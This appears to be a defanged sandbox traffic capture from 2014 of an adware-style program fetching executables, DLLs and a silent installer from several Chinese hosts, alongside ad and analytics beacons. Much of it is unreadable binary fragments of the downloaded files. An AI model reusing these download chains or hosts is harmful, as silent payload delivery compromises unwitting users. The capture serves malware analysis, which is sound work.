..=UvO.*..2l...c.t_g.g.R..d...@..#ivY. .1..... g.....|..w.{E..Z.....N.
.O..y.......bO_...>...w.e.q..b............7{P s..*..r...i...wuu.zAK
._u..,b.d.Q. ...i.6.Z.?..V.x.xu........p..nWWK.....S`1.>."5.>...
j".(...I....i..[.....]/..*F}%.M.G......... ]C.3$..8bD.|../.L..v&t4./z@
L.T.......&.........L:....T....!..\.....6........%b.t..j.f}>K...a.,
.KHd.B..W..O.....1..3.MWn.@]...xw..y.s...f.3. ,.I] 5k.#.<.......G..
.ej..yU..4L{..m.;.V......q.`...vm..r4.j..k.x.. .).2Y:P...p.?1>_.M..
b.*/.At".#=T.:..Z.ug.:..v.g...8Gc..xy9.{..........s.....\.......M.
<<< skipped >>>

GET /collect?v=1&_v=j22&a=66525772&t=pageview&_s=1&dl=http://mini.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null&dr=http://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=1320146&go=&ul=en-us&de=utf-8&dt=风云直播MINI&sd=32-bit&sr=1276x846&vp=1010x550&je=0&fl=11.6 r602&_u=ME~&cid=2131950969.1402680550&tid=UA-42145803-1&z=1816808476 HTTP/1.1


Accept: */*
Referer: hXXp://mini.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.google-analytics.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Pragma: no-cache
Expires: Mon, 07 Aug 1995 23:30:00 GMT
Access-Control-Allow-Origin: *
Last-Modified: Sun, 17 May 1998 03:00:00 GMT
X-Content-Type-Options: nosniff
Content-Type: image/gif
Date: Wed, 11 Jun 2014 18:09:16 GMT
Server: Golfe2
Content-Length: 35
Age: 170388
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Alternate-Protocol: 80:quic
GIF89a.............,...........D..;HTTP/1.1 200 OK..Pragma: no-cache..
Expires: Mon, 07 Aug 1995 23:30:00 GMT..Access-Control-Allow-Origin: *
..Last-Modified: Sun, 17 May 1998 03:00:00 GMT..X-Content-Type-Options
: nosniff..Content-Type: image/gif..Date: Wed, 11 Jun 2014 18:09:16 GM
T..Server: Golfe2..Content-Length: 35..Age: 170388..Cache-Control: pri
vate, no-cache, no-cache=Set-Cookie, proxy-revalidate..Alternate-Proto
col: 80:quic..GIF89a.............,...........D..;..



GET /goodpic_dae_619.zip HTTP/1.0
Host: souhu.1htb.cn
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Length: 3034064
Content-Type: application/x-zip-compressed
Last-Modified: Sat, 24 May 2014 15:27:48 GMT
Accept-Ranges: bytes
ETag: "1c192eb86477cf1:464"
Server: Microsoft-IIS/6.0
Date: Fri, 13 Jun 2014 17:28:33 GMT
Connection: close
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$..............O...O
...O...O...Oz..O...Oz..O...O7..O...O...O...Oz..O...O...O...Oz..O...ORi
ch...O........................PE..L...t#^S......................-.....
[email protected]!/...................
..................p...P........W-..........0..............P...........
........................@...............D............................t
ext............................... ..`.rdata........... ..............
....@[email protected][email protected]......`-...
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>


GET /xvideo/xvideo15s140529.aspx HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://resource.ws.kukuplay.com/players/2014/05/23/60130//fengyun.swf
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: resource.m0wscdn.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Thu, 29 May 2014 09:43:14 GMT
ETag: "53870132-22eb3"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
X-Via-Cache: sx
Content-Length: 143027
Accept-Ranges: bytes
Date: Fri, 13 Jun 2014 03:20:43 GMT
Age: 136893
Connection: keep-alive
X-cdn: ydcdn
X-hit-at: sx
...P?.....]....Ik...0..W...1....K.|.a4`*K.P...s..q.x...,...O5t......D.
I. .:......`/}1=....N[.....:|.k.....{..{k.n.P`..M.."...k]...i.......H.
.p_....48.. ..XT.......Tl.m7.. UT....^.v>.........L..=H...M.wTG.^wu
............Y..*..u.n<k...Z......:....GL.....i...^0..K.e...\..&..e.
.5...|..f.E..{...9z.?.......vL........I../.Ah......i...6O..[.........d
... ]2....3...U....b.......:.[.....^...-xc..=}ETs.1g.9.. .\.r...5.=...
.F.N..v{......8...u..Z...H..QQ.A.d.8.h......*@..J...f}N*...s.... .ZF.O
.3.3;.WdMl....V......... .fvy5..'...........ab..q....p../...C.%.... .J
^....Y"0.q...U.H.on.t.f.R.p.3E....@=S......%WX.........Ax.....^.q....&
gt;..<.........&...h .]Pw.....B..^'..-E..9n:}N ...YL..%....~}......
nX.......V.y.}o...<....k..f8o`.Ib$Fe!179.egP............F3...q..E.C
....v.....RTg.<V.a.....}o..#.........AQ.......AP5.H.Dt...M...</.
[."..Q`.a....YT....Om.j..])..$A.q.);.va4C....Bw...... D....>....,.1
S........{.:]...w_x.\..e..<.:1C.;.zp..=qP....H........U.|.C.u..^J..
........_&..=...,..4.f....l...fi .2.iG.hG...T7./.:. .IU.#)...-Z{.A.b.J
..Uy...#.r.......2..,.............$G.*.[..S....6...."...9..>..e..~W
....J..*._V......!...E.....8!.8.......kQ....]..N.7.N..M*Q.....eMe..v.'
.....r...... %.r....o..../.6.M.......4.....K...$.7..R...v....!):..' .D
 .ns..g.n..JP.F.0..^...I..<}G..0..W....G.Fg.q....g.x.......=*.9...B
.....(}):[email protected]"f.....a3S..E.=.8.....w...x..;.L..t.M~.c
UQ...n.....]..H...<~.>.......=.......w.}...A.....e.../..../....U
./...Jh.k^?..rm..i{...o......J'11a.-...x..SP.WO.Y.`....8. P#.U q..
<<< skipped >>>


GET /go/full/1/70745 HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: w.x.baidu.com
Range: bytes=7995392-
Referer: hXXp://w.x.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.4.3
Date: Fri, 13 Jun 2014 17:29:25 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.2
Location: hXXp://dl1sw.baidu.com/client/ws1215/0611/BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe



GET /media/v1/0f000Z60Ab17JZtxZIQVnf.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://ubmcmm.baidustatic.com/media/v1/0f0002EBaHfWMpy9Ew2v2s.swf?url_type=1&id_555316071=media/v1/0f000rmn6cn7D14hDeZLyf.gif&id_5553832
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ubmcmm.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:11 GMT
Content-Type: application/x-shockwave-flash
Connection: close
Content-Length: 2870
Cache-Control: max-age=31536000
Expires: Fri, 13 Mar 2015 10:29:01 GMT
Last-Modified: Sat, 25 Apr 2009 07:04:00 GMT
media: media
CWS.....x..WypS...}OO..........H.l0`..l.s$..;.8.......k.'[&mj[.y.....O
..v&..4!.C2......i&.G.C......4N.t....O.l3..}.~......vWn....i. .......e
...T.\..{...Q.....V.R7...fswwwi...@..\VYYi.....M......t.../^Z..h..l...
=..Ah.L ..,]z......FB....5s^...........XkG ...Z:..zXZ.3GMaw...Mwq../.v
W.o..>[email protected]...\(..!..................\m=.qEJ........6.....RK.'m%
..n..6..C...@$.r..<...(.)..r..K.;#t'W..M.5..7E..4...[.,..rSy...b...
V.L........u..g-h.L...N.....H\o1.E`.*.:....L......\q[.!...wF.G.......\
;:.~.H.<..Xp......<B>,2..J).........j...OE..........>..Vm6
\...g......D.w..?F..hA.sL~.......%...o./.....n.....^G........5.&..[R.?
z.e.<.$..^.~f?.?......|.a.........06.@%....w..dh....%..u-Edp....w./
.s...T....x......W....W<h .?d.I Sr..y.U...^.^.X..Z4r....`..Z...idR.
Lu~_p....l~._?:...E....C].....K...G....f.{..4.^..VFl.:c;.e...'.0}...w.
.2.?wYu,...vM...E.C..x.z....r.......z[..[.?.9..X....^...:...=.'gUm.d\u
...e..k...f..../..#...8.u....*...Y`.`./.4,.,..p.P.b..P|.D`=....x......
..5}.)....P..mT...:...Y.&z...;.U...g..N...^J......(R......4...J....v..
Y....|.. .lG..E."....q>QX?.Z...v..}`Dl..g..0..e.Ko.&..r:.{s....18u.
..z...?.....m..9..H....<......x.......{...L....f.....Q.d,...0.<.
.........zK..........F.0.G.U.......m..c.#Q.(3_...C....}...."..3...#.|k
."...Od.'..c.Tn.. ...O..kf...`...:.96\..>..z.C...............<..
k..h|.3.^..tX..|S0.oJ..Ck...\e;.kQ...].J../...j...d.2Y..G...,H.C......
_)...Q..../..o<...=.~=.3.g.........R.\W[R...g.....t.~pL.X....|]..GN
...^.j.i.....Z..P.$.y.."......z..).].d..-..g....=.cEYS..6.....c.fw
<<< skipped >>>


GET /ok/?f=fengyunzhibo.com&c=693619_1371525642501 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://mini.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: statistics.m0lxcdn.kukuplay.com
Connection: Keep-Alive
Cookie: Hm_lvt_7aa2cb65324b0d2de0102de5dc741760=1402680565; Hm_lpvt_7aa2cb65324b0d2de0102de5dc741760=1402680565


HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 11 Nov 2013 18:27:40 GMT
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Content-Encoding: gzip
X-Via-Cache: jx
X-cdn: ydcdn
X-hit-at: jx
Content-Length: 344
Accept-Ranges: bytes
Date: Fri, 13 Jun 2014 17:29:38 GMT
X-Varnish: 2020944634 2009179847
Age: 137740
Via: 1.1 varnish
Connection: keep-alive
..........]Q.N.@......&.%..P..-...r..'...iI.....'L....7O~....n....l...
yo..Gg....j.!&...p..`A...L=b..7e...\.(R..w. .k...wH..)[email protected]..:d...a.
a,f_...o..O.../...?E4....v....Q..JP.l...,Q.[......*.(.....$..bB.. ..L.
i ..a$S ..m8.....PJ`.Q...f..y.G([email protected].|....eBCkS...=
.8C..?..F..;.?..3....`.z.Q.i.....h..%IkM.H...j...'../(...UK.....HTTP/1
.1 200 OK..Content-Type: text/html..Last-Modified: Mon, 11 Nov 2013 18
:27:40 GMT..Expires: Thu, 31 Dec 2037 23:55:55 GMT..Cache-Control: max
-age=315360000..Content-Encoding: gzip..X-Via-Cache: jx..X-cdn: ydcdn.
.X-hit-at: jx..Content-Length: 344..Accept-Ranges: bytes..Date: Fri, 1
3 Jun 2014 17:29:38 GMT..X-Varnish: 2020944634 2009179847..Age: 137740
..Via: 1.1 varnish..Connection: keep-alive............]Q.N.@......&.%.
.P..-...r..'...iI.....'L....7O~....n....l...yo..Gg....j.!&...p..`A...L
=b..7e...\.(R..w. .k...wH..)[email protected]..:d...a.a,f_...o..O.../...?E4....v
....Q..JP.l...,Q.[......*.(.....$..bB.. ..L.i ..a$S ..m8.....PJ`.Q...f
..y.G([email protected].|....eBCkS...=.8C..?..F..;.?..3....`.z.Q
.i.....h..%IkM.H...j...'../(...UK.......



GET /adx.php?c=cz03YzllNGFlNjgyYWRkZWM0AHQ9MTQwMjY4MDU0MgBzZT0xAGJ1PTEAcHJpY2U9VTVzMDNnQUdncGw3akVwZ1c1SUE4cG9KTkw2cDBXXzk0TVVzV1EAY2htZD0xAHY9MQBpPWI1MjVhM2Nj HTTP/1.1
Accept: */*
Referer: hXXp://pos.baidu.com/ecom?cec=utf-8&dai=3&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=728&rsi1=90&rsi5=4<r=<u=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680537275&lunum=6&ch=0&at=6&qn=18a90fef6d4567e7&ps=357x3&tn=text_default_728_90&ts=1&td_id=1537506&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537506
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: wn.pos.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=49F93F86C60D03A8D23F3919153C48A7:FG=1; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:03 GMT
Content-Type: image/gif
Content-Length: 49
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
GIF89a...................!.......,...........T..;..



GET /client/ws1215/0611/BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dl1sw.baidu.com
Range: bytes=7995392-
Referer: hXXp://w.x.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.0 206 Partial Content
Expires: Sun, 13 Jul 2014 16:12:29 GMT
Date: Fri, 13 Jun 2014 16:12:29 GMT
Server: nginx
Content-Type: application/octet-stream
Last-Modified: Tue, 10 Jun 2014 19:14:19 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Content-Range: bytes 7995392-30927031/30927032
Content-Length: 22931640
Age: 4616
Via: 1.0 sdytwt86:80 (Cdn Cache Server V2.0), 1.0 tswt76:80 (Cdn Cache Server V2.0), 1.0 shiben10:10003 (Cdn Cache Server V2.0)
Connection: close
Content-Disposition: attachment;filename="BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe"
.....Qm....y...d....I....kyrr.......M.......\..q.=...v.`u.8.[.;.....4.
...E.W...2..? ...|.k.`.=...G..h,S...a............(.._.g........&[...#.
u)62DB..ss..h....3i..d...S....jn.;..).F."...x....(Z..4|.5..2.;.v.L*.|O
........wvx.......O^[email protected]?..dC[..V4D..?.
T.........Y.............._....._....&f`..(i..D^..>......!..........
t.....S8B.g8./...x...24......&...([email protected]&.z.... ..>q..d....}
W0...R..a.^..[........x.)3f..)....P..y.}.>..4.I]#......).vf....x..=
..... M.6.e........./n$C..0..Z..U'...:....)...j.....k.:.,..^=?.dpO...~
...8.t=....5..(..TD..$.Y.).PM..dAH../...w.$...V.;.P./..9..H....^......
.W1.\...v....h*...67<."..5......r...o.... '.X....U........e.^A.g...
_{...h.J...._b..`.5g......b...I..!,...-P.?%F..<q...9.rD...#...Xt8-.
.g...B...X..N~..rI`%.{.d^.}..>...n..Jlj*1.G...'...L..=-.I).E...e&.}
.....^..P%...b|Dt...[....Ij.}.. >..Vd.. .E/P..s{e..................
..i...;5R].(.A4...6.R6\.od....w..}.....;4.......JM....v.,...u.Y.......
...VD.......0*g.....j.U..}.r...\..b..BC.......-k......#)Z.Ko......\.4.
.P.kZ..]%...ti....ti..Nw.......Z....p8..#.Xa.....vJj..Y....>...4;o=
.6.)...,.E5.FN...NZ.&r[..R.R.c.."....B....".l.,.....nv.....2.*.....]-.
 &P...Y.J..2l....9.?M.......^e.N..`X..R..n....Vg..E.!.P^........Sy....
o....0.)5.O%....wPb...dy....ZB]....ns.e{.E,m^?A.7...Z......hb....;..v2
R...m 0....* ...r..>).2.li....!......Y...y.....X4....^...0.........
...qp-....K......o.~...Ln_1K...........P$........=u.~y..[..n.i){......
..7.... ...DI..([email protected][.....b~...$.....d....ns.4.%.
<<< skipped >>>


GET /crossdomain.xml HTTP/1.1
Accept: */*
Accept-Language: en-US
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: resource.m0wscdn.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 255
Accept-Ranges: bytes
Date: Fri, 13 Jun 2014 03:20:31 GMT
Age: 0
Connection: close
X-cdn: ydcdn
<?xml version="1.0"?>.<!DOCTYPE cross-domain-policy SYSTEM "/
xml/dtds/cross-domain-policy.dtd">.<cross-domain-policy> .   
<site-control permitted-cross-domain-policies="master-only"/>.  
 <allow-access-from domain="*" to-ports="*" />.</cross-domain
-policy>..



GET /up_17.html?06132028 HTTP/1.1
User-Agent: vb   wininet
Host: update.aiqingzhihui.com


HTTP/1.1 200 OK
Date: Fri, 13 Jun 2014 17:28:39 GMT
Content-Length: 21
Content-Type: text/html
Last-Modified: Fri, 11 Apr 2014 04:57:32 GMT
Connection: Keep-Alive
ETag: "5a28e38b4255cf1:2079"
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Fw-Via: DISK HIT from cnc-sd-010-065.fcd, MISS from cnc-tj-021-032.fcd
,r~}uxv...,7>...;;<l`..



GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Range: bytes=917504-
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 206 Partial Content
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:28:39 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 290016
Content-Range: bytes 917504-1207519/1207520
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT
Expires: Sat, 14 Jun 2014 07:20:40 GMT
x-bs-version: A65F70E089635AE47A1E2AED4F13B889
ETag: 30cbc602ada7cdfb0346038c05996d84
x-bs-request-id: MTAuMjE0LjQyLjIyOjgwODA6MTQ3NzYzMjU5MToxMS9KdW4vMjAxNCAxNToyMDo0MCA=
x-bs-meta-crc32: 2965621797
Content-MD5: 30cbc602ada7cdfb0346038c05996d84
x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
$,.....$..........L$ .`......T$..U...;.u...G....>..F......f=l.u..D$
dPQj.......`...5f=f.u3.T$TRQ......`...D$\P.L$XQ...`...T$dR.D$`P...`...
L$d........0.........P....$.<......h......$....Rf..f....#.RQ3.f....
.Qh.......`..........h......$....Rf..f....#.f..RQ........Ph.......`...
P...h......$....Rf..f....#.f..RQ........P..f..f..h......$....P..#.RQj.
h.......`....u.f..$......$.....D$.3.9t$ t-.t$ ...P....I........u.j.j. 
.PVj.j....`..... .D$...t....N..d$.f.....f..u. .....$.....tE.D$..3. .;.
}.....;.$....| ..$.........x...?P..$....P......p.....$.....L$.;...$...
.~m..t(;...}c....j.h.G..........9......;|$.|..A..$....3.9.$....... ...
 .;.~...;.}..d$...$......f..j ....;.|..l$..........D$...tU..t...VP....
.................$.....u...$.... .;.........6RP..$........iR.)........
....|$ .........t[.D6.P........|$ .T$,.N.Q.L$(..$....................V
W................$........tLW.........A..$.....u...$.... .;...r.....$.
......V.R.T$,..i.L$$._.........l$..|$.........|$.....$.....t2;........
.$........j.h.G.................;.|..b.....$....3.9.$....... ... .;.~.
..;...;.....$......f..j ....;.|......f=}.u...C....f=}...$..........f=.
.......f=..w|..t"....j.S.................$...........u....;.~0..f..i..
......B.;.~..........$......RV............f..f..i..f.K.......f..h.e..t
.....j.S.................$.....S..u....;.~...f..j.7....B.;.~..........
$......RV......H.....f..f..i........$.....l$...$.......f..........$...
..........$....;...$......................$.......L?.QR...............
.i..$.....t$.....$.....\$...r .Q...........q..t.W............_..$.
<<< skipped >>>


GET /adx.php?c=cz1hYjk2NDU4YTc5YTgwY2Y5AHQ9MTQwMjY4MDU2NABzZT0xAGJ1PTEAcHJpY2U9VTVzMDlBQU9xSDE3akVwZ1c1SUE4aDVGVHFhWkVBLThXVUlIeEEAY2htZD0xAHY9MQBpPThiZTBkNzI2 HTTP/1.1
Accept: */*
Referer: hXXp://pos.baidu.com/ecom?cec=utf-8&dai=2&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=336&rsi1=280&rsi5=4<r=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html<u=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680568181&lunum=6&ch=0&at=6&qn=791141dc1b3cdefb&ps=-2x-2&tn=text_default_336_280&ts=1&td_id=1537511&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537511
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: wn.pos.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISBID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISUS=49F93F86C60D03A8D23F3919153C48A7:FG=1; CPROID=49F93F86C60D03A8D23F3919153C48A7:FG=1; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:27 GMT
Content-Type: image/gif
Content-Length: 49
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
GIF89a...................!.......,...........T..;..



GET /sw-search-sp/client/dlljg1/BDMNet.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Range: bytes=917504-
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 206 Partial Content
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:17 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 327104
Content-Range: bytes 917504-1244607/1244608
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Wed, 21 Aug 2013 08:14:12 GMT
Expires: Sat, 14 Jun 2014 07:46:32 GMT
x-bs-version: 3DB44104797F6F34C7AB9E0A496537CC
ETag: 6812edbc825d28224d79d3645c9bb0f6
x-bs-request-id: MTAuMjE1Ljg4LjM2OjgwODA6MjQzNDMzNTU2MDoxMS9KdW4vMjAxNCAxNTo0NjozMiA=
x-bs-meta-crc32: 440605594
Content-MD5: 6812edbc825d28224d79d3645c9bb0f6
x-bs-client-ip: MTE1LjIzMS40Mi4xODE=
....dw...Tw......=.w...r..pw..P..2.....3....w........w...pw......=.w..
.r...w..P..2.....3....w........w....w......=.w...r...w..P.]2.....3....
w........w....w......=.w...r...w..P.-2.....3....w........w....w......=
.w...r...w..P..1.....3....w........w....w......=.x...r...w..P..1.....3
....x........x....w......=,x...r...x..P..1.....3...,x.......(x....x...
...=Hx...r..4x..P.m1.....3...Hx.......Dx...4x......=dx...r..Px..P.=1..
...3...dx.......`x...Px......=.x...r..lx..P..1.....3....x.......|x...l
x......=.x...r...x..P..0.....3....x........x....x......=.x...r...x..P.
.0.....3....x........x....x......=.x...r...x..P.}0.....3....x........x
....x......=.x...r...x..P.M0.....3....x........x....x......=.y...r...x
..P..0.....3....y........y....x......=(y...r...y..P../.....3...(y.....
..$y....y......=Dy...r..0y..P../[email protected]......=`y...r
..Ly..P../.....3...`y.......\y...Ly......=|y...r..hy..P.]/.....3...|y.
......xy...hy......=.y...r...y..P.-/.....3....y........y....y.....h ..
.........u..%\..............h ...........u..%\.....................t..
...........u....P.....3..........t.P..................3..........t.P..
................h ...........u..%\...............=.y...r...y..P.=.....
.3....y........y..f..y.....=.y...r...y..P........3....y........y....y.
....hp.....|.........=.....r......P..-.....3........................3.
.........t.P..................3..........t.P...................=.....r
......P.]-.....3........................h ...........u..%\............
..................3..........t.P..................................
<<< skipped >>>


GET /a.js?did=2&ch=0&jk=6dc8052231d438f7&tn=text_default_336_280&n=67025059_1_cpr&js=c&tu=u1537511&word=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&if=0&aw=0&ah=0&dt=1402680541&pt=23078&ps=20140613082903666&it=16391&vs=1&vt=16391&ft=23078&op=100&csp=1276,818&bcl=758,450&pof=758,493&top=-2&left=-2&fs=1&total=3&rdm=1402680566775 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: eclick.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:25 GMT
Content-Type: application/x-javascript
Content-Length: 0
Last-Modified: Thu, 01 Sep 2011 06:45:57 GMT
Connection: keep-alive
Expires: Fri, 13 Jun 2014 18:29:25 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes
....


GET /a.js?did=3&ch=0&jk=18a90fef6d4567e7&tn=text_default_728_90&n=67025059_1_cpr&js=c&tu=u1537506&word=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&if=0&aw=739&ah=90&dt=1402680541&pt=19141&ps=20140613082907603&it=16391&vs=1&vt=16391&ft=19141&op=100&csp=1276,818&bcl=758,450&pof=758,493&top=357&left=3&fs=1&total=3&rdm=1402680566806 HTTP/1.1


Accept: */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: eclick.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:25 GMT
Content-Type: application/x-javascript
Content-Length: 0
Last-Modified: Thu, 01 Sep 2011 06:45:57 GMT
Connection: keep-alive
Expires: Fri, 13 Jun 2014 18:29:25 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes
HTTP/1.1 200 OK..Server: nginx..Date: Fri, 13 Jun 2014 17:29:25 GMT..C
ontent-Type: application/x-javascript..Content-Length: 0..Last-Modifie
d: Thu, 01 Sep 2011 06:45:57 GMT..Connection: keep-alive..Expires: Fri
